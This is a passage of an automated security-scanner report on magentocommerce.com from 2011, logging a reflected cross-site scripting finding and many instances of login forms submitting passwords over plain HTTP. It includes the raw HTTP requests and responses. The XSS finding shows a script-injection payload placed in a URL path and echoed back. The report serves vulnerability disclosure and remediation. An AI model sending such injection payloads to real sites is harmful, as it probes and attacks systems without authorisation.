<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Job Post
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/job-post.html?18915"><script>alert(1)</script>8cadda0bb16=1" />
...[SNIP]...

1.54. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71721"><script>alert(1)</script>7f09bd527cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/skin71721"><script>alert(1)</script>7f09bd527cd/frontend/enterprise/mc/favicon.ico HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:42 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/skin71721"><script>alert(1)</script>7f09bd527cd/frontend/enterprise/mc/favicon.ico" />
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 150 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.magentocommerce.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:40:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: guid=db13949594b1b3d2138f3212e370aacf; expires=Mon, 06-Aug-2012 13:40:32 GMT; path=/
Set-Cookie: exp_domain=magentocommerce.com; expires=Sat, 11-Aug-2012 23:48:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=997810832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:40:32 GMT
Content-Length: 35354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.2. http://www.magentocommerce.com/!!!--  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.3. http://www.magentocommerce.com/answers/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
        <form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
           <input type="hidden" name="login[back_url]" value="/answers/">
...[SNIP]...
</label>
           <input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]" /></p>
...[SNIP]...

2.4. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.5. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.6. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.8. http://www.magentocommerce.com/boards/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.9. http://www.magentocommerce.com/boards/viewforum/10252/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.10. http://www.magentocommerce.com/boards/viewthread/1647/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.11. http://www.magentocommerce.com/bug-tracking  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.12. http://www.magentocommerce.com/casestudies  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /casestudies

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /casestudies HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176318; expires=Sat, 11-Aug-2012 15:11:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fcasestudies%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:58 GMT
Content-Length: 52582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.13. http://www.magentocommerce.com/company/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
